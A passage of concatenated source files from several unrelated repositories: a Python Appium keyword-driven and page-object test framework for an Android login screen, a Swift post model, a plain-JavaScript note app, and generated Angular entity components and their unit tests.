                result = expect_result(expect_key)#返回如driver.find_element_by_XX(expect_key)
                print('-------result-----------',result)
                if result:
                    data.write_value(i,'pass')
                else:
                    data.write_value(i,'fail')
                '''
                expect_result = getattr(aciton_method,expect_step)# e.g. ActionMethod().get_element
                #print('------------expect_result-----------',expect_result)
                if expect_key:
                    result = expect_result(expect_key)# e.g. driver.find_element_by_XX(expect_key)
                    #print('-------expect_key:result-----------',result)
                    if result:
                        data.write_value(i,'pass')
                        #print('-------expect_key:result-----------pass')
                    else:
                        data.write_value(i,'fail')
                        #print('-------expect_key:result-----------fail')
                else:
                    result = expect_result(expect_value)
                    #print('-------expect_value:result-----------',result)
                    if result:
                        data.write_value(i,'pass')
                        #print('-------expect_value:result-----------pass')
                    else:
                        data.write_value(i,'fail')
                        #print('-------expect_value:result-----------fail')
# Entry point for the keyword-driven runner.
if __name__ == '__main__':
    RunMain().run_method()
import unittest
import HtmlTestRunner
import threading
import multiprocessing
import time
from appium import webdriver
import sys
sys.path.append("..")
from business.login_business import LoginBusiness
from util.server import Server
from util.write_user_command import WriteUserCommand
class ParameTestCase(unittest.TestCase):
    '''
    Base TestCase that accepts an extra constructor argument, since stock
    unittest cannot pass parameters into test cases. The value is stashed
    in a module-level global so class-level hooks can read it.
    '''
    def __init__(self, methodName='runTest', parame=None):
        super(ParameTestCase, self).__init__(methodName)
        # Module-level global so setUpClass(cls) (a classmethod with no access
        # to instance state) can see the injected parameter.
        global parames
        parames = parame
class CaseTest(ParameTestCase):
    '''
    Login test cases; inherits ParameTestCase so a device index (parame)
    can be injected per suite. `parames` is the module-level global set
    by the base-class constructor.
    '''

    @classmethod
    def setUpClass(cls):
        print('setUpClass', parames)
        cls.login_business = LoginBusiness(parames)

    def setUp(self):
        print("this is setup")

    def test_01(self):
        print("para:" + str(parames))
        self.login_business.login_pass()

    # Restored decorator: the original source had been mangled to
    # '<EMAIL>("CaseTest")' by an export/redaction step; the trailing comment
    # ("skip test_02, CaseTest is the class name") identifies it as a skip.
    @unittest.skip("CaseTest")
    def test_02(self):
        print("para:" + str(parames))
        self.login_business.login_user_error()

    def tearDown(self):
        print("this is teardown")
def appium_init():
    """Start the Appium server(s) for all connected devices."""
    Server().main()
def get_suite(i):
    """Build and run the test suite for device index i.

    Writes an HTML report named 'report<i+1>' into ../report. `parame=i`
    routes the device index into CaseTest via ParameTestCase.
    """
    suite = unittest.TestSuite()
    suite.addTest(CaseTest("test_02",parame=i))
    suite.addTest(CaseTest("test_01",parame=i))
    # Plain-console alternative (kept for reference):
    #unittest.TextTestRunner().run(suite)
    file_name = 'report'+str(i+1)
    HtmlTestRunner.HTMLTestRunner(output="../report",report_name=file_name).run(suite)
def get_count():
    """Number of device records stored in the user-config yaml file."""
    return WriteUserCommand().get_file_lines()
if __name__ == '__main__':
    # Start Appium first, then run one suite per configured device,
    # each in its own process so the devices execute in parallel.
    appium_init()
    threads = []
    for i in range(get_count()):
        print('threads', i)
        # Threading alternative (kept for reference):
        #t = threading.Thread(target=get_suite,args=(i,))
        t = multiprocessing.Process(target=get_suite, args=(i,))
        threads.append(t)
    for j in threads:
        j.start()
<file_sep>/util/write_user_command.py
import yaml
class WriteUserCommand:
    """Read/write helper for ../config/userconfig.yaml, which stores one
    device/port record (`user_info_<i>`) per connected device."""

    def read_data(self):
        '''
        Load the yaml file and return its contents as a dict.
        '''
        with open('../config/userconfig.yaml') as f:
            data = yaml.load(f, Loader=yaml.FullLoader)
        return data

    def get_value(self, key, port):
        '''
        Return one field (`port`) of one record (`key`) from the yaml dict.
        '''
        data = self.read_data()
        value = data[key][port]
        return value

    def write_data(self, i, device, bp, port, systemport):
        '''
        Append one device record to the yaml file.
        '''
        data = self.join_data(i, device, bp, port, systemport)
        # Open in append mode: each call adds another user_info_<i> mapping.
        with open("../config/userconfig.yaml", "a") as f:
            yaml.dump(data, f)

    def join_data(self, i, device, bp, port, systemport):
        # Build the record written by write_data.
        # NOTE(review): key 'daviceName' looks like a typo of 'deviceName',
        # but readers elsewhere may depend on it — do not rename silently.
        data = {
            'user_info_'+str(i): {
                'daviceName': device,
                'bp': bp,
                'port': port,
                'systemport': systemport
            }}
        return data

    def clear_data(self):
        '''
        Empty the yaml file (called before a fresh Appium launch).
        '''
        with open("../config/userconfig.yaml", "w") as f:
            f.truncate()

    def get_file_lines(self):
        # Number of top-level records (devices) in the file.
        data = self.read_data()
        return len(data)
# Manual smoke test: write one record and read one field back.
if __name__ == '__main__':
    WriteUserCommand().write_data(1, '127.0.0.1:21503', '4900', '4700', 5100)
    print(WriteUserCommand().get_value('user_info_1', 'bp'))
    #print(write_file)
import sys
sys.path.append("..")
from util.get_by_local import GetByLocal
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from base.base_driver import BaseDriver
class LoginPage:
    """Page object for the login screen.

    Element locators come from LocalElement.ini via GetByLocal; the driver
    for device index `i` is created by BaseDriver.
    """

    def __init__(self, i):
        base_driver = BaseDriver()
        self.driver = base_driver.android_driver(i)
        self.get_by_local = GetByLocal(self.driver)

    def get_username_element(self):
        """Username input field."""
        return self.get_by_local.get_element('username')

    def get_password_element(self):
        """Password input field."""
        return self.get_by_local.get_element('password')

    def get_login_button_element(self):
        """Login button."""
        return self.get_by_local.get_element('login_button')

    def get_forget_password_element(self):
        """'Forgot password' link."""
        return self.get_by_local.get_element('forget_password')

    def get_register_element(self):
        """Registration link."""
        return self.get_by_local.get_element('register')

    def get_toast_element(self, message):
        """Wait up to 10s for a toast whose text contains `message`; return it.

        Raises selenium's TimeoutException when no matching toast appears.
        """
        # Bug fix: the message must be an XPath *string literal*. The old code
        # spliced the raw text in unquoted, which only worked when callers
        # embedded their own quotes — keep accepting pre-quoted strings so
        # such callers stay compatible.
        text = str(message)
        quoted = text if text.startswith(("'", '"')) else "'" + text + "'"
        xpath_element = "//*[contains(@text," + quoted + ")]"
        toast_element = ("xpath", xpath_element)
        return WebDriverWait(self.driver, 10, 0.01).until(EC.presence_of_element_located(toast_element))
<file_sep>/README.md
PO模型、关键字模型
# # 定义# #
Page Object Model的核心是分离测试对象和测试数据
# config #
配置测试数据等
case.xls,关键字模型的测试步骤及数据
LocalElement.ini,页面元素的属性等
userconfig.yaml,多进程,程序自动存储的设备号,端口信息
# util #
读取config文件中的元素属性信息key,value
定义查找元素是按照id或者classname等方式,返回driver.find_element_by_key('value')
dos_cmd.py,python调用执行cmd命令
get_by_local.py,分解ini文件,取到元素方法、属性,并返回driver.find_element_by_XXX(元素属性)
opera_excel.py,关键字模型,处理excel
port.py,判断端口是否被占用,生成可用的端口
read_init.py,读取ini文件等号后面的值
server.py,多线程启动多台设备的appium
write_user_command.py,定义处理yaml文件的方式
# base #
定义driver
# page #
调取util,整合util中的文件,定义被测页面全部元素信息;调用driver,定义driver
# handle #
调用page,定义被测页面全部元素的操作方式,如send_keys或click
# business #
业务:调用handle,传入输入框数据等参数等,定义测试案例的操作步骤
# case #
调用business,执行测试案例、报告输出定义等
# report #
存储测试报告
# keyword #
aciton_method.py,关键字模型,定义操作,获取元素属性等操作
get_data.py,从调用util-opera_excel.py,从config-case.xls中,获取关键字模型的数据
run_main.py,关键字模型运行程序的入口,执行excel测试案例,并填写测试结果
# log #
appium的运行日志存储的地方
<file_sep>/util/read_init.py
import configparser
'''
read_ini = configparser.ConfigParser()
read_ini.read('../config/LocalElement.ini')
print(read_ini.get('login_element','username'))
'''
class ReadIni:
    """Read element locators from an ini file.

    Defaults to the project's locator file ../config/LocalElement.ini when
    no path is supplied.
    """

    def __init__(self, file_path=None):
        # Fall back to the project default when no explicit path is given.
        if file_path == None:
            self.file_path = '../config/LocalElement.ini'
        else:
            self.file_path = file_path
        self.data = self.read_ini()

    def read_ini(self):
        """Parse the ini file and return the ConfigParser instance.

        ConfigParser.read() silently ignores missing files, so a bad path
        simply yields an empty parser (get_value then returns None).
        """
        read_ini = configparser.ConfigParser()
        read_ini.read(self.file_path)
        return read_ini

    def get_value(self, key, section='login_element'):
        """Return the value for `key` in `section`, or None when absent.

        Catches only the two expected lookup failures instead of the old
        bare `except:`, which also hid real errors (e.g. KeyboardInterrupt).
        """
        try:
            value = self.data.get(section, key)
        except (configparser.NoSectionError, configparser.NoOptionError):
            value = None
        return value
# Manual check: print the locator for the login username field.
if __name__ == '__main__':
    read_ini = ReadIni()
    print(read_ini.get_value('username','login_element'))
import os
class DosCmd:
    """Thin wrapper around shell command execution."""

    def excute_cmd_get_result(self, command):
        """Run `command` and return its stdout as a list of lines.

        Blank lines are dropped; trailing newlines are stripped from the rest.
        """
        raw_lines = os.popen(command).readlines()
        return [line.strip('\n') for line in raw_lines if line != '\n']

    def excute_cmd(self, command):
        """Run `command`, discarding its output."""
        os.system(command)
# Manual smoke test: list attached adb devices.
if __name__ == '__main__':
    print(DosCmd().excute_cmd_get_result('adb devices'))
<file_sep>/keyword/aciton_method.py
import sys
sys.path.append("..")
from util.get_by_local import GetByLocal
from base.base_driver import BaseDriver
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class ActionMethod:
    """Keyword-driven action library.

    Each public method corresponds to a step name in the Excel sheet and is
    invoked by RunMain via getattr. Methods take *args so every step shares
    one calling convention: args[0] is the locator key (or value) and
    args[1], when present, is the input value.
    """

    def __init__(self):
        self.driver = BaseDriver().android_driver(0)
        self.get_by_local = GetByLocal(self.driver)

    def input_key(self, *args):
        """Type args[1] into the element located by key args[0]."""
        element = self.get_by_local.get_element(args[0])
        if element == None:
            return args[0], "元素未找到"
        element.send_keys(args[1])

    def on_click(self, *args):
        """Click the element located by key args[0]."""
        element = self.get_by_local.get_element(args[0])
        if element == None:
            return args[0], "元素未找到"
        element.click()

    def sleep_time(self, *args):
        """Pause for args[0] seconds."""
        time.sleep(int(args[0]))

    def get_size(self, *args):
        """Return the screen (width, height) in pixels."""
        size = self.driver.get_window_size()
        width = size['width']
        height = size['height']
        return width, height

    def swipe_left(self, *args):
        """Swipe from the right-hand side of the screen to the left."""
        x1 = self.get_size()[0] / 10 * 9
        y1 = self.get_size()[1] / 2
        x = self.get_size()[0] / 10
        # Dropped the stray debug prints the original left behind.
        self.driver.swipe(x1, y1, x, y1)

    def swipe_right(self, *args):
        """Swipe from the left-hand side of the screen to the right."""
        x1 = self.get_size()[0] / 10
        y1 = self.get_size()[1] / 2
        x = self.get_size()[0] / 10 * 9
        self.driver.swipe(x1, y1, x, y1)

    def swipe_up(self, *args):
        """Swipe from near the bottom of the screen towards the top."""
        x1 = self.get_size()[0] / 2
        y1 = self.get_size()[1] / 10 * 9
        y = self.get_size()[1] / 10
        self.driver.swipe(x1, y1, x1, y)

    def swipe_down(self, *args):
        """Swipe from near the top of the screen towards the bottom."""
        x1 = self.get_size()[0] / 2
        y1 = self.get_size()[1] / 10
        y = self.get_size()[1] / 10 * 9
        self.driver.swipe(x1, y1, x1, y)

    def get_element(self, *args):
        """Locate the element for key args[0]; None when not found."""
        element = self.get_by_local.get_element(args[0])
        if element == None:
            return None
        return element

    def get_toast(self, *args):
        """Wait up to 10s for a toast whose text contains args[0]; return it.

        Bug fixes vs. the original: the XPath previously embedded the literal
        characters 'args[0]' instead of the caller's text, and the WebDriverWait
        was executed twice (once inside a debug print, once for the result).
        """
        # Quote the text unless the caller already supplied an XPath string
        # literal (same convention as LoginPage.get_toast_element).
        text = str(args[0])
        quoted = text if text.startswith(("'", '"')) else "'" + text + "'"
        toast_element = ("xpath", "//*[contains(@text," + quoted + ")]")
        element = WebDriverWait(self.driver, 10, 0.1).until(EC.presence_of_element_located(toast_element))
        if element == None:
            return None
        return element
<file_sep>/util/port.py
import sys
sys.path.append("..")
from util.dos_cmd import DosCmd
class Port:
    """Helpers for finding free local TCP ports via netstat."""

    def port_is_used(self, port_num):
        """Return True when netstat reports the port as in use."""
        command = 'netstat -ano | findstr ' + str(port_num)
        occupied = DosCmd().excute_cmd_get_result(command)
        return len(occupied) > 0

    def create_port_list(self, start_port, device_list):
        """Return one free port per entry in device_list.

        Scans upwards from start_port; returns None (after printing an error)
        when device_list is None.
        """
        if device_list is None:
            print("生成可用端口失败")
            return None
        port_list = []
        candidate = start_port
        while len(port_list) != len(device_list):
            if not self.port_is_used(candidate):
                port_list.append(candidate)
            candidate = candidate + 1
        return port_list
# Manual check: find five free ports starting at 8079.
if __name__ == '__main__':
    device_list = [1, 2, 3, 4, 5]
    print(Port().create_port_list(8079, device_list))
<file_sep>/config/LocalElement.ini
[login_element]
username = id>cn.com.open.mooc:id/account_edit
password = id>cn.com.open.mooc:id/password_edit
login_button = id>cn.com.open.mooc:id/login_lable
forget_password = id>cn.com.open.mooc:id/forget_lable
register = id>cn.com.open.mooc:id/tv_register
| b6eb1c8f510056b5e784b9425920c5e42aecc138 | [
"Markdown",
"Python",
"INI"
] | 16 | Python | cwx727/Appium-Python- | b10d62914302f17b0df95e379cfd5fa0de3eff23 | 44a3b9ec032eb63fda20ad1fb300596c059f0ecc |
refs/heads/master | <file_sep>//
// Post.swift
// Makestagram
//
// Created by <NAME> on 2017-06-30.
// Copyright © 2017 <NAME>. All rights reserved.
//
import Foundation
import UIKit
import FirebaseDatabase.FIRDataSnapshot
class Post {
    // properties and initializers

    /// Database key for this post; nil until one is assigned after creation.
    var key: String?
    /// URL string of the post's image.
    let imageURL: String
    /// Height of the image (stored so it can be round-tripped with the post).
    let imageHeight: CGFloat
    /// Timestamp captured at the moment the Post object is created.
    let creationDate: Date

    init(imageURL: String, imageHeight: CGFloat) {
        self.imageURL = imageURL
        self.imageHeight = imageHeight
        self.creationDate = Date()
    }

    /// Dictionary form of the post — presumably the payload written to the
    /// Firebase realtime database (created_at is a Unix timestamp).
    var dictValue: [String : Any] {
        let createdAgo = creationDate.timeIntervalSince1970
        return["image_url" : imageURL,
               "image_height" : imageHeight,
               "created_at" : createdAgo]
    }
}
<file_sep>//
// FindFriendsViewController.swift
// Makestagram
//
// Created by <NAME> on 2017-06-29.
// Copyright © 2017 <NAME>. All rights reserved.
//
import Foundation
| 26b64a7286fdcdc68c8556db6275d1c5ae1af06f | [
"Swift"
] | 2 | Swift | raymonddiamonds/Makestagram | 61223c5ed07a0a12a3533ff411c43852c216de17 | ba0cb93a8c6473dd73058150713888b09126192d |
refs/heads/main | <file_sep># pure-js-note-app
Very simple note application using pure JavaScript.
<file_sep>// take the form references using object
// Cached references to the note-entry form controls.
const fromFields = {}
fromFields.textNote = document.querySelector('#textNote');
fromFields.priority = document.querySelector('#priority');
fromFields.addBtn = document.querySelector('#addBtn');
// Container element that every created note is appended to.
const allNotes = document.querySelector('#allNotes');
// Focus the textarea so the user can start typing immediately.
fromFields.textNote.focus();
// add note function
function addNote() {
  const text = fromFields.textNote.value;
  const priority = fromFields.priority.value;

  const note = document.createElement('div');
  note.classList.add('col-md-4', 'single-note');

  // Build the note body with DOM APIs and textContent so user-supplied
  // text cannot inject markup (the previous innerHTML template string
  // interpolated raw input and was XSS-prone).
  const noteText = document.createElement('div');
  noteText.classList.add('note-text');

  const textPara = document.createElement('p');
  textPara.textContent = text;

  const prioritySpan = document.createElement('span');
  prioritySpan.textContent = `Priority: ${priority}`;

  noteText.appendChild(textPara);
  noteText.appendChild(document.createElement('br'));
  noteText.appendChild(prioritySpan);
  note.appendChild(noteText);

  const deleteBtn = document.createElement('span');
  deleteBtn.classList.add('remove');
  deleteBtn.textContent = 'X';
  note.appendChild(deleteBtn);

  allNotes.appendChild(note);

  // Reset the input for the next note.
  fromFields.textNote.value = '';
  fromFields.textNote.focus();

  // Wire up this note's delete button.
  addListenerRemoveNote(deleteBtn);
}
// remove note
function removeNote(e) {
  // The clicked delete button's parent is the note container; detach it.
  const note = e.target.parentNode;
  note.remove();
}
function addListenerRemoveNote(deleteBtn) {
  // Delete the owning note on click; stop the event from bubbling further.
  deleteBtn.addEventListener('click', (e) => {
    e.stopPropagation();
    removeNote(e);
  });
}
// all event listeners
// "Create Note" event listener: validate the textarea, then create the note.
fromFields.addBtn.addEventListener('click', function (e) {
    e.preventDefault();
    if (fromFields.textNote.value != '') {
        // call create function
        addNote();
    }
    else {
        alert('Please add your note before click add button');
    }
})
| 23c3978e4f82033678688e95fc5e722f06647ac6 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | MohcinBN/pure-js-note-app | 3f1429a5a44249a6aeb037bc2015a10ce56e853b | 1a1293251d83fa32937df276013dec2ec3ec45b2 |
refs/heads/main | <file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs';
import { finalize, map } from 'rxjs/operators';
import * as dayjs from 'dayjs';
import { DATE_TIME_FORMAT } from 'app/config/input.constants';
import { IJobHistoryMySuffix, JobHistoryMySuffix } from '../job-history-my-suffix.model';
import { JobHistoryMySuffixService } from '../service/job-history-my-suffix.service';
import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
import { JobMySuffixService } from 'app/entities/job-my-suffix/service/job-my-suffix.service';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { DepartmentMySuffixService } from 'app/entities/department-my-suffix/service/department-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
/**
 * Create/edit form for JobHistoryMySuffix entities.
 *
 * Loads the routed entity into a reactive form, populates dropdown option
 * lists for the job/department/employee relationships, and saves via
 * JobHistoryMySuffixService (update when an id exists, create otherwise).
 */
@Component({
  selector: 'jhi-job-history-my-suffix-update',
  templateUrl: './job-history-my-suffix-update.component.html',
})
export class JobHistoryMySuffixUpdateComponent implements OnInit {
  // True while a save request is in flight (reset when the request settles).
  isSaving = false;

  // Candidate options for the relationship dropdowns; queried with the
  // 'jobhistory-is-null' filter in loadRelationshipsOptions().
  jobsCollection: IJobMySuffix[] = [];
  departmentsCollection: IDepartmentMySuffix[] = [];
  employeesCollection: IEmployeeMySuffix[] = [];

  // Reactive form mirroring the JobHistoryMySuffix fields.
  editForm = this.fb.group({
    id: [],
    startDate: [],
    endDate: [],
    language: [],
    job: [],
    department: [],
    employee: [],
  });

  constructor(
    protected jobHistoryService: JobHistoryMySuffixService,
    protected jobService: JobMySuffixService,
    protected departmentService: DepartmentMySuffixService,
    protected employeeService: EmployeeMySuffixService,
    protected activatedRoute: ActivatedRoute,
    protected fb: FormBuilder
  ) {}

  /** Seed default dates for new entities, patch the form, and load dropdown options. */
  ngOnInit(): void {
    this.activatedRoute.data.subscribe(({ jobHistory }) => {
      if (jobHistory.id === undefined) {
        // New entity: default both dates to the start of today.
        const today = dayjs().startOf('day');
        jobHistory.startDate = today;
        jobHistory.endDate = today;
      }

      this.updateForm(jobHistory);

      this.loadRelationshipsOptions();
    });
  }

  /** Navigate back to the previous page. */
  previousState(): void {
    window.history.back();
  }

  /** Persist the form: update when an id is present, create otherwise. */
  save(): void {
    this.isSaving = true;
    const jobHistory = this.createFromForm();
    if (jobHistory.id !== undefined) {
      this.subscribeToSaveResponse(this.jobHistoryService.update(jobHistory));
    } else {
      this.subscribeToSaveResponse(this.jobHistoryService.create(jobHistory));
    }
  }

  // trackBy functions for the relationship option lists.
  trackJobMySuffixById(index: number, item: IJobMySuffix): string {
    return item.id!;
  }

  trackDepartmentMySuffixById(index: number, item: IDepartmentMySuffix): string {
    return item.id!;
  }

  trackEmployeeMySuffixById(index: number, item: IEmployeeMySuffix): string {
    return item.id!;
  }

  /** Route the save result into the success/error hooks and always clear isSaving. */
  protected subscribeToSaveResponse(result: Observable<HttpResponse<IJobHistoryMySuffix>>): void {
    result.pipe(finalize(() => this.onSaveFinalize())).subscribe(
      () => this.onSaveSuccess(),
      () => this.onSaveError()
    );
  }

  protected onSaveSuccess(): void {
    this.previousState();
  }

  protected onSaveError(): void {
    // Api for inheritance.
  }

  protected onSaveFinalize(): void {
    this.isSaving = false;
  }

  /** Patch the form from the entity and make sure its current relations appear in the option lists. */
  protected updateForm(jobHistory: IJobHistoryMySuffix): void {
    this.editForm.patchValue({
      id: jobHistory.id,
      startDate: jobHistory.startDate ? jobHistory.startDate.format(DATE_TIME_FORMAT) : null,
      endDate: jobHistory.endDate ? jobHistory.endDate.format(DATE_TIME_FORMAT) : null,
      language: jobHistory.language,
      job: jobHistory.job,
      department: jobHistory.department,
      employee: jobHistory.employee,
    });

    this.jobsCollection = this.jobService.addJobMySuffixToCollectionIfMissing(this.jobsCollection, jobHistory.job);
    this.departmentsCollection = this.departmentService.addDepartmentMySuffixToCollectionIfMissing(
      this.departmentsCollection,
      jobHistory.department
    );
    this.employeesCollection = this.employeeService.addEmployeeMySuffixToCollectionIfMissing(this.employeesCollection, jobHistory.employee);
  }

  /** Query candidate relations (unlinked ones) and merge in the currently selected values. */
  protected loadRelationshipsOptions(): void {
    this.jobService
      .query({ filter: 'jobhistory-is-null' })
      .pipe(map((res: HttpResponse<IJobMySuffix[]>) => res.body ?? []))
      .pipe(map((jobs: IJobMySuffix[]) => this.jobService.addJobMySuffixToCollectionIfMissing(jobs, this.editForm.get('job')!.value)))
      .subscribe((jobs: IJobMySuffix[]) => (this.jobsCollection = jobs));

    this.departmentService
      .query({ filter: 'jobhistory-is-null' })
      .pipe(map((res: HttpResponse<IDepartmentMySuffix[]>) => res.body ?? []))
      .pipe(
        map((departments: IDepartmentMySuffix[]) =>
          this.departmentService.addDepartmentMySuffixToCollectionIfMissing(departments, this.editForm.get('department')!.value)
        )
      )
      .subscribe((departments: IDepartmentMySuffix[]) => (this.departmentsCollection = departments));

    this.employeeService
      .query({ filter: 'jobhistory-is-null' })
      .pipe(map((res: HttpResponse<IEmployeeMySuffix[]>) => res.body ?? []))
      .pipe(
        map((employees: IEmployeeMySuffix[]) =>
          this.employeeService.addEmployeeMySuffixToCollectionIfMissing(employees, this.editForm.get('employee')!.value)
        )
      )
      .subscribe((employees: IEmployeeMySuffix[]) => (this.employeesCollection = employees));
  }

  /** Build the entity payload from the current form values (dates parsed from the input format). */
  protected createFromForm(): IJobHistoryMySuffix {
    return {
      ...new JobHistoryMySuffix(),
      id: this.editForm.get(['id'])!.value,
      startDate: this.editForm.get(['startDate'])!.value ? dayjs(this.editForm.get(['startDate'])!.value, DATE_TIME_FORMAT) : undefined,
      endDate: this.editForm.get(['endDate'])!.value ? dayjs(this.editForm.get(['endDate'])!.value, DATE_TIME_FORMAT) : undefined,
      language: this.editForm.get(['language'])!.value,
      job: this.editForm.get(['job'])!.value,
      department: this.editForm.get(['department'])!.value,
      employee: this.editForm.get(['employee'])!.value,
    };
  }
}
<file_sep>jest.mock('@ng-bootstrap/ng-bootstrap');
import { ComponentFixture, TestBed, inject, fakeAsync, tick } from '@angular/core/testing';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { of } from 'rxjs';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
import { RegionMySuffixDeleteDialogComponent } from './region-my-suffix-delete-dialog.component';
// Unit tests for the RegionMySuffix delete dialog: confirmDelete must call the
// service and close the modal; cancel must only dismiss it.
describe('Component Tests', () => {
  describe('RegionMySuffix Management Delete Component', () => {
    let comp: RegionMySuffixDeleteDialogComponent;
    let fixture: ComponentFixture<RegionMySuffixDeleteDialogComponent>;
    let service: RegionMySuffixService;
    let mockActiveModal: NgbActiveModal;

    beforeEach(() => {
      // Component compiled with an empty template; modal is the jest-mocked NgbActiveModal.
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [RegionMySuffixDeleteDialogComponent],
        providers: [NgbActiveModal],
      })
        .overrideTemplate(RegionMySuffixDeleteDialogComponent, '')
        .compileComponents();
      fixture = TestBed.createComponent(RegionMySuffixDeleteDialogComponent);
      comp = fixture.componentInstance;
      service = TestBed.inject(RegionMySuffixService);
      mockActiveModal = TestBed.inject(NgbActiveModal);
    });

    describe('confirmDelete', () => {
      it('Should call delete service on confirmDelete', inject(
        [],
        fakeAsync(() => {
          // GIVEN
          spyOn(service, 'delete').and.returnValue(of({}));

          // WHEN
          comp.confirmDelete('ABC');
          tick();

          // THEN
          expect(service.delete).toHaveBeenCalledWith('ABC');
          expect(mockActiveModal.close).toHaveBeenCalledWith('deleted');
        })
      ));

      it('Should not call delete service on clear', () => {
        // GIVEN
        spyOn(service, 'delete');

        // WHEN
        comp.cancel();

        // THEN
        expect(service.delete).not.toHaveBeenCalled();
        expect(mockActiveModal.close).not.toHaveBeenCalled();
        expect(mockActiveModal.dismiss).toHaveBeenCalled();
      });
    });
  });
});
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
@Injectable({ providedIn: 'root' })
export class DepartmentMySuffixRoutingResolveService implements Resolve<IDepartmentMySuffix> {
  constructor(protected service: DepartmentMySuffixService, protected router: Router) {}

  /**
   * Resolve the DepartmentMySuffix for the routed id.
   * No id yields a blank entity; an unknown id redirects to the 404 page.
   */
  resolve(route: ActivatedRouteSnapshot): Observable<IDepartmentMySuffix> | Observable<never> {
    const departmentId = route.params['id'];
    if (!departmentId) {
      return of(new DepartmentMySuffix());
    }
    return this.service.find(departmentId).pipe(
      mergeMap((response: HttpResponse<DepartmentMySuffix>) => {
        const body = response.body;
        if (!body) {
          this.router.navigate(['404']);
          return EMPTY;
        }
        return of(body);
      })
    );
  }
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { JobHistoryMySuffixService } from '../service/job-history-my-suffix.service';
import { IJobHistoryMySuffix, JobHistoryMySuffix } from '../job-history-my-suffix.model';
import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
import { JobMySuffixService } from 'app/entities/job-my-suffix/service/job-my-suffix.service';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { DepartmentMySuffixService } from 'app/entities/department-my-suffix/service/department-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
import { JobHistoryMySuffixUpdateComponent } from './job-history-my-suffix-update.component';
// Unit tests for JobHistoryMySuffixUpdateComponent: ngOnInit must load the
// relationship option lists and patch the form; save must call update/create
// and navigate back on success; trackBy functions must return the entity id.
describe('Component Tests', () => {
  describe('JobHistoryMySuffix Management Update Component', () => {
    let comp: JobHistoryMySuffixUpdateComponent;
    let fixture: ComponentFixture<JobHistoryMySuffixUpdateComponent>;
    let activatedRoute: ActivatedRoute;
    let jobHistoryService: JobHistoryMySuffixService;
    let jobService: JobMySuffixService;
    let departmentService: DepartmentMySuffixService;
    let employeeService: EmployeeMySuffixService;

    beforeEach(() => {
      // Component compiled with an empty template; ActivatedRoute is jest-mocked.
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [JobHistoryMySuffixUpdateComponent],
        providers: [FormBuilder, ActivatedRoute],
      })
        .overrideTemplate(JobHistoryMySuffixUpdateComponent, '')
        .compileComponents();

      fixture = TestBed.createComponent(JobHistoryMySuffixUpdateComponent);
      activatedRoute = TestBed.inject(ActivatedRoute);
      jobHistoryService = TestBed.inject(JobHistoryMySuffixService);
      jobService = TestBed.inject(JobMySuffixService);
      departmentService = TestBed.inject(DepartmentMySuffixService);
      employeeService = TestBed.inject(EmployeeMySuffixService);

      comp = fixture.componentInstance;
    });

    describe('ngOnInit', () => {
      it('Should call job query and add missing value', () => {
        const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
        const job: IJobMySuffix = { id: 'hacking maximize' };
        jobHistory.job = job;

        const jobCollection: IJobMySuffix[] = [{ id: 'deposit' }];
        spyOn(jobService, 'query').and.returnValue(of(new HttpResponse({ body: jobCollection })));
        const expectedCollection: IJobMySuffix[] = [job, ...jobCollection];
        spyOn(jobService, 'addJobMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        expect(jobService.query).toHaveBeenCalled();
        expect(jobService.addJobMySuffixToCollectionIfMissing).toHaveBeenCalledWith(jobCollection, job);
        expect(comp.jobsCollection).toEqual(expectedCollection);
      });

      it('Should call department query and add missing value', () => {
        const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
        const department: IDepartmentMySuffix = { id: 'CFA' };
        jobHistory.department = department;

        const departmentCollection: IDepartmentMySuffix[] = [{ id: 'Tasty' }];
        spyOn(departmentService, 'query').and.returnValue(of(new HttpResponse({ body: departmentCollection })));
        const expectedCollection: IDepartmentMySuffix[] = [department, ...departmentCollection];
        spyOn(departmentService, 'addDepartmentMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ jobHistory });
        comp.ngOnInit();

        expect(departmentService.query).toHaveBeenCalled();
        expect(departmentService.addDepartmentMySuffixToCollectionIfMissing).toHaveBeenCalledWith(departmentCollection, department);
        expect(comp.departmentsCollection).toEqual(expectedCollection);
      });

      it('Should call employee query and add missing value', () => {
        const jobHistory: IJobHistoryMySuffix = { id: 'CBA' };
